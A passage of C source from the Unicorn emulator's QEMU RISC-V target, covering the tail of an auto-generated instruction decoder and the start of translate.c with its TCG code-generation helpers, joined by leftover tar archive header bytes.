&u.f_decode_insn3212)) return true; return false; case 0x2: /* 11010000 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:63 */ if (trans_fcvt_s_l(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11010000 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:64 */ if (trans_fcvt_s_lu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x69: /* 1101001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:208 */ if (trans_fcvt_d_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:209 */ if (trans_fcvt_d_wu(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11010010 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:70 */ if (trans_fcvt_d_l(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11010010 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:71 */ if (trans_fcvt_d_lu(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x70: /* 1110000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11100000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:174 */ if (trans_fmv_x_w(ctx, &u.f_decode_insn3213)) return true; return false; case 0x00001000: /* 11100000 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:178 */ if (trans_fclass_s(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x71: /* 1110001. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11100010 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:69 */ if (trans_fmv_x_d(ctx, &u.f_decode_insn3213)) return true; return false; case 0x00001000: /* 11100010 0000.... .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:205 */ if (trans_fclass_d(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x78: /* 1111000. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11110000 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:181 */ if (trans_fmv_w_x(ctx, &u.f_decode_insn3213)) return true; return false; } return false; case 0x79: /* 1111001. ........ ........ .1010011 */ decode_insn32_extract_r2(ctx, &u.f_decode_insn3213, insn); switch (insn & 0x01f07000) { case 0x00000000: /* 11110010 0000.... .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:72 */ if (trans_fmv_d_x(ctx, &u.f_decode_insn3213)) return true; return false; } return false; } return false; case 0x00000063: /* ........ ........ ........ .1100011 */ decode_insn32_extract_b(ctx, &u.f_b, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:90 */ if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x1: /* ........ ........ .001.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:91 */ if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x4: /* ........ ........ .100.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:92 */ if (trans_blt(ctx, &u.f_b)) return true; return false; case 0x5: /* ........ ........ .101.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:93 */ if (trans_bge(ctx, &u.f_b)) return true; return false; case 0x6: /* ........ ........ .110.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:94 */ if (trans_bltu(ctx, &u.f_b)) return true; return false; case 0x7: /* ........ ........ .111.... .1100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:95 */ if (trans_bgeu(ctx, &u.f_b)) return true; return false; } return false; case 0x00000067: /* ........ ........ ........ .1100111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:89 */ if (trans_jalr(ctx, &u.f_i)) return true; return false; } return false; case 0x0000006f: /* ........ ........ ........ .1101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:88 */ decode_insn32_extract_j(ctx, &u.f_j, insn); if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x00000073: /* ........ ........ ........ .1110011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .1110011 */ switch (insn & 0xfe000f80) { case 0x00000000: /* 0000000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x0: /* 00000000 00000000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:74 */ if (trans_ecall(ctx, &u.f_empty)) return true; return false; case 0x20: /* 00000000 00010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:75 */ if (trans_ebreak(ctx, &u.f_empty)) return true; return false; case 0x40: /* 00000000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:76 */ if (trans_uret(ctx, &u.f_empty)) return true; return false; } return false; case 0x10000000: /* 0001000. ........ .0000000 01110011 */ switch ((insn >> 20) & 0x1f) { case 0x2: /* 00010000 0010.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:77 */ if (trans_sret(ctx, &u.f_empty)) return true; return false; } return false; case 0x4: /* 00010000 0100.... .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:83 */ decode_insn32_extract_sfence_vm(ctx, &u.f_decode_insn3215, insn); if (trans_sfence_vm(ctx, &u.f_decode_insn3215)) return true; return false; case 0x5: /* 00010000 0101.... .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x1f) { case 0x0: /* 00010000 01010000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:79 */ if (trans_wfi(ctx, &u.f_empty)) return true; return false; } return false; } return false; case 0x12000000: /* 0001001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:82 */ decode_insn32_extract_sfence_vma(ctx, &u.f_decode_insn3214, insn); if (trans_sfence_vma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x22000000: /* 0010001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:81 */ decode_insn32_extract_hfence_bvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_bvma(ctx, &u.f_decode_insn3214)) return true; return false; case 0x30000000: /* 0011000. ........ .0000000 01110011 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); switch ((insn >> 15) & 0x3ff) { case 0x40: /* 00110000 00100000 00000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:78 */ if (trans_mret(ctx, &u.f_empty)) return true; return false; } return false; case 0x62000000: /* 0110001. ........ .0000000 01110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:80 */ decode_insn32_extract_hfence_gvma(ctx, &u.f_decode_insn3214, insn); if (trans_hfence_gvma(ctx, &u.f_decode_insn3214)) return true; return false; } return false; case 0x1: /* ........ ........ .001.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:125 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrw(ctx, &u.f_decode_insn329)) return true; return false; case 0x2: /* ........ ........ .010.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:126 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrs(ctx, &u.f_decode_insn329)) return true; return false; case 0x3: /* ........ ........ .011.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:127 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrc(ctx, &u.f_decode_insn329)) return true; return false; case 0x5: /* ........ ........ .101.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:128 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrwi(ctx, &u.f_decode_insn329)) return true; return false; case 0x6: /* ........ ........ .110.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:129 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrsi(ctx, &u.f_decode_insn329)) return true; return false; case 0x7: /* ........ ........ .111.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:130 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrci(ctx, &u.f_decode_insn329)) return true; return false; } return false; } return false; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/translate.c���������������������������������������������������������0000664�0000000�0000000�00000073345�14675241067�0020744�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V emulation for qemu: main translation routines. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "instmap.h" #include "unicorn/platform.h" #include "uc_priv.h" #include "exec/gen-icount.h" /* * Unicorn: Special disas state for exiting in the middle of tb. */ #define DISAS_UC_EXIT DISAS_TARGET_6 typedef struct DisasContext { DisasContextBase base; /* pc_succ_insn points to the instruction following base.pc_next */ target_ulong pc_succ_insn; target_ulong priv_ver; bool virt_enabled; uint32_t opcode; uint32_t mstatus_fs; uint32_t misa; uint32_t mem_idx; /* Remember the rounding mode encoded in the previous fp instruction, which we have already installed into env->fp_status. Or -1 for no previous fp instruction. Note that we exit the TB when writing to any system register, which includes CSR_FRM, so we do not have to reset this known value. */ int frm; bool ext_ifencei; // Unicorn struct uc_struct *uc; bool invalid; // invalid instruction, discoverd by translator } DisasContext; #ifdef TARGET_RISCV64 /* convert riscv funct3 to qemu memop for load/store */ static const int tcg_memop_lookup[8] = { // [0 ... 7] = -1, [0] = MO_SB, [1] = MO_TESW, [2] = MO_TESL, [3] = MO_TEQ, [4] = MO_UB, [5] = MO_TEUW, [6] = MO_TEUL, [7] = -1, }; #endif #ifdef TARGET_RISCV64 #define CASE_OP_32_64(X) case X: case glue(X, W) #else #define CASE_OP_32_64(X) case X #endif static inline bool has_ext(DisasContext *ctx, uint32_t ext) { return ctx->misa & ext; } static void generate_exception(DisasContext *ctx, int excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); tcg_temp_free_i32(tcg_ctx, helper_tmp); ctx->base.is_jmp = DISAS_NORETURN; } static void generate_exception_mbadaddr(DisasContext *ctx, int excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); tcg_gen_st_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_env, offsetof(CPURISCVState, badaddr)); TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); tcg_temp_free_i32(tcg_ctx, helper_tmp); ctx->base.is_jmp = DISAS_NORETURN; } static void gen_exception_debug(TCGContext *tcg_ctx) { TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, EXCP_DEBUG); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); tcg_temp_free_i32(tcg_ctx, helper_tmp); } /* Wrapper around tcg_gen_exit_tb that handles single stepping */ static void exit_tb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->base.singlestep_enabled) { gen_exception_debug(tcg_ctx); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } } /* Wrapper around tcg_gen_lookup_and_goto_ptr that handles single stepping */ static void lookup_and_goto_ptr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->base.singlestep_enabled) { gen_exception_debug(tcg_ctx); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } static void gen_exception_illegal(DisasContext *ctx) { generate_exception(ctx, RISCV_EXCP_ILLEGAL_INST); } static void gen_exception_inst_addr_mis(DisasContext *ctx) { generate_exception_mbadaddr(ctx, RISCV_EXCP_INST_ADDR_MIS); } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->base.singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (use_goto_tb(ctx, dest)) { /* chaining is only allowed when the jump is to the same page */ tcg_gen_goto_tb(tcg_ctx, n); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dest); /* No need to check for single stepping here as use_goto_tb() will * return false in case of single stepping. */ tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dest); lookup_and_goto_ptr(ctx); } } /* Wrapper for getting reg values - need to check of reg is zero since * cpu_gpr[0] is not actually allocated */ static inline void gen_get_gpr(TCGContext *tcg_ctx, TCGv t, int reg_num) { if (reg_num == 0) { tcg_gen_movi_tl(tcg_ctx, t, 0); } else { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->cpu_gpr[reg_num]); } } /* Wrapper for setting reg values - need to check of reg is zero since * cpu_gpr[0] is not actually allocated. this is more for safety purposes, * since we usually avoid calling the OP_TYPE_gen function if we see a write to * $zero */ static inline void gen_set_gpr(TCGContext *tcg_ctx, int reg_num_dst, TCGv t) { if (reg_num_dst != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg_num_dst], t); } } static void gen_mulhsu(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { TCGv rl = tcg_temp_new(tcg_ctx); TCGv rh = tcg_temp_new(tcg_ctx); tcg_gen_mulu2_tl(tcg_ctx, rl, rh, arg1, arg2); /* fix up for one negative */ tcg_gen_sari_tl(tcg_ctx, rl, arg1, TARGET_LONG_BITS - 1); tcg_gen_and_tl(tcg_ctx, rl, rl, arg2); tcg_gen_sub_tl(tcg_ctx, ret, rh, rl); tcg_temp_free(tcg_ctx, rl); tcg_temp_free(tcg_ctx, rh); } static void gen_div(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, cond2, zeroreg, resultopt1; /* * Handle by altering args to tcg_gen_div to produce req'd results: * For overflow: want source1 in source1 and 1 in source2 * For div by zero: want -1 in source1 and 1 in source2 -> -1 result */ cond1 = tcg_temp_new(tcg_ctx); cond2 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)-1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond2, source2, (target_ulong)(~0L)); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source1, ((target_ulong)1) << (TARGET_LONG_BITS - 1)); tcg_gen_and_tl(tcg_ctx, cond1, cond1, cond2); /* cond1 = overflow */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond2, source2, 0); /* cond2 = div 0 */ /* if div by zero, set source1 to -1, otherwise don't change */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source1, cond2, zeroreg, source1, resultopt1); /* if overflow or div by zero, set source2 to 1, else don't change */ tcg_gen_or_tl(tcg_ctx, cond1, cond1, cond2); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond1, zeroreg, source2, resultopt1); tcg_gen_div_tl(tcg_ctx, ret, source1, source2); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, cond2); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_divu(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, zeroreg, resultopt1; cond1 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source2, 0); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)-1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source1, cond1, zeroreg, source1, resultopt1); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond1, zeroreg, source2, resultopt1); tcg_gen_divu_tl(tcg_ctx, ret, source1, source2); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_rem(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, cond2, zeroreg, resultopt1; cond1 = tcg_temp_new(tcg_ctx); cond2 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, resultopt1, 1L); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond2, source2, (target_ulong)-1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source1, (target_ulong)1 << (TARGET_LONG_BITS - 1)); tcg_gen_and_tl(tcg_ctx, cond2, cond1, cond2); /* cond1 = overflow */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source2, 0); /* cond2 = div 0 */ /* if overflow or div by zero, set source2 to 1, else don't change */ tcg_gen_or_tl(tcg_ctx, cond2, cond1, cond2); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond2, zeroreg, source2, resultopt1); tcg_gen_rem_tl(tcg_ctx, resultopt1, source1, source2); /* if div by zero, just return the original dividend */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, ret, cond1, zeroreg, resultopt1, source1); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, cond2); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_remu(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, zeroreg, resultopt1; cond1 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source2, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond1, zeroreg, source2, resultopt1); tcg_gen_remu_tl(tcg_ctx, resultopt1, source1, source2); /* if div by zero, just return the original dividend */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, ret, cond1, zeroreg, resultopt1, source1); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_jal(DisasContext *ctx, int rd, target_ulong imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong next_pc; /* check misaligned: */ next_pc = ctx->base.pc_next + imm; if (!has_ext(ctx, RVC)) { if ((next_pc & 0x3) != 0) { gen_exception_inst_addr_mis(ctx); return; } } if (rd != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], ctx->pc_succ_insn); } gen_goto_tb(ctx, 0, ctx->base.pc_next + imm); /* must use this for safety */ ctx->base.is_jmp = DISAS_NORETURN; } #ifdef TARGET_RISCV64 static void gen_load_c(DisasContext *ctx, uint32_t opc, int rd, int rs1, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); int memop = tcg_memop_lookup[(opc >> 12) & 0x7]; if (memop < 0) { gen_exception_illegal(ctx); return; } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, memop); gen_set_gpr(tcg_ctx, rd, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_store_c(DisasContext *ctx, uint32_t opc, int rs1, int rs2, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv dat = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); gen_get_gpr(tcg_ctx, dat, rs2); int memop = tcg_memop_lookup[(opc >> 12) & 0x7]; if (memop < 0) { gen_exception_illegal(ctx); return; } tcg_gen_qemu_st_tl(tcg_ctx, dat, t0, ctx->mem_idx, memop); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, dat); } #endif /* The states of mstatus_fs are: * 0 = disabled, 1 = initial, 2 = clean, 3 = dirty * We will have already diagnosed disabled state, * and need to turn initial/clean into dirty. */ static void mark_fs_dirty(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv tmp; if (ctx->mstatus_fs == MSTATUS_FS) { return; } /* Remember the state change for the rest of the TB. */ ctx->mstatus_fs = MSTATUS_FS; tmp = tcg_temp_new(tcg_ctx); tcg_gen_ld_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus)); tcg_gen_ori_tl(tcg_ctx, tmp, tmp, MSTATUS_FS | MSTATUS_SD); tcg_gen_st_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus)); if (ctx->virt_enabled) { tcg_gen_ld_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus_hs)); tcg_gen_ori_tl(tcg_ctx, tmp, tmp, MSTATUS_FS | MSTATUS_SD); tcg_gen_st_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus_hs)); } tcg_temp_free(tcg_ctx, tmp); } #if !defined(TARGET_RISCV64) static void gen_fp_load(DisasContext *ctx, uint32_t opc, int rd, int rs1, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (ctx->mstatus_fs == 0) { gen_exception_illegal(ctx); return; } t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); switch (opc) { case OPC_RISC_FLW: if (!has_ext(ctx, RVF)) { goto do_illegal; } tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd], t0, ctx->mem_idx, MO_TEUL); /* RISC-V requires NaN-boxing of narrower width floating point values */ tcg_gen_ori_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd], tcg_ctx->cpu_fpr[rd], 0xffffffff00000000ULL); break; case OPC_RISC_FLD: if (!has_ext(ctx, RVD)) { goto do_illegal; } tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd], t0, ctx->mem_idx, MO_TEQ); break; do_illegal: default: gen_exception_illegal(ctx); break; } tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); } static void gen_fp_store(DisasContext *ctx, uint32_t opc, int rs1, int rs2, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (ctx->mstatus_fs == 0) { gen_exception_illegal(ctx); return; } t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); switch (opc) { case OPC_RISC_FSW: if (!has_ext(ctx, RVF)) { goto do_illegal; } tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rs2], t0, ctx->mem_idx, MO_TEUL); break; case OPC_RISC_FSD: if (!has_ext(ctx, RVD)) { goto do_illegal; } tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rs2], t0, ctx->mem_idx, MO_TEQ); break; do_illegal: default: gen_exception_illegal(ctx); break; } tcg_temp_free(tcg_ctx, t0); } #endif static void gen_set_rm(DisasContext *ctx, int rm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; if (ctx->frm == rm) { return; } ctx->frm = rm; t0 = tcg_const_i32(tcg_ctx, rm); gen_helper_set_rounding_mode(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } static void decode_RV32_64C0(DisasContext *ctx, uint16_t opcode) { uint8_t funct3 = extract16(opcode, 13, 3); uint8_t rd_rs2 = GET_C_RS2S(opcode); uint8_t rs1s = GET_C_RS1S(opcode); switch (funct3) { case 3: #if defined(TARGET_RISCV64) /* C.LD(RV64/128) -> ld rd', offset[7:3](rs1')*/ gen_load_c(ctx, OPC_RISC_LD, rd_rs2, rs1s, GET_C_LD_IMM(opcode)); #else /* C.FLW (RV32) -> flw rd', offset[6:2](rs1')*/ gen_fp_load(ctx, OPC_RISC_FLW, rd_rs2, rs1s, GET_C_LW_IMM(opcode)); #endif break; case 7: #if defined(TARGET_RISCV64) /* C.SD (RV64/128) -> sd rs2', offset[7:3](rs1')*/ gen_store_c(ctx, OPC_RISC_SD, rs1s, rd_rs2, GET_C_LD_IMM(opcode)); #else /* C.FSW (RV32) -> fsw rs2', offset[6:2](rs1')*/ gen_fp_store(ctx, OPC_RISC_FSW, rs1s, rd_rs2, GET_C_LW_IMM(opcode)); #endif break; } } static void decode_RV32_64C(DisasContext *ctx, uint16_t opcode) { uint8_t op = extract16(opcode, 0, 2); switch (op) { case 0: decode_RV32_64C0(ctx, opcode); break; } } #define EX_SH(amount) \ static int ex_shift_##amount(DisasContext *ctx, int imm) \ { \ return imm << amount; \ } EX_SH(1) EX_SH(2) EX_SH(3) EX_SH(4) EX_SH(12) #define REQUIRE_EXT(ctx, ext) do { \ if (!has_ext(ctx, ext)) { \ return false; \ } \ } while (0) static int ex_rvc_register(DisasContext *ctx, int reg) { return 8 + reg; } static int ex_rvc_shifti(DisasContext *ctx, int imm) { /* For RV128 a shamt of 0 means a shift by 64. */ return imm ? imm : 64; } /* Include the auto-generated decoder for 32 bit insn */ #ifdef TARGET_RISCV32 #include "riscv32/decode_insn32.inc.c" #else #include "riscv64/decode_insn32.inc.c" #endif static bool gen_arith_imm_fn(DisasContext *ctx, arg_i *a, void (*func)(TCGContext *, TCGv, TCGv, target_long)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1; source1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); (*func)(tcg_ctx, source1, source1, a->imm); 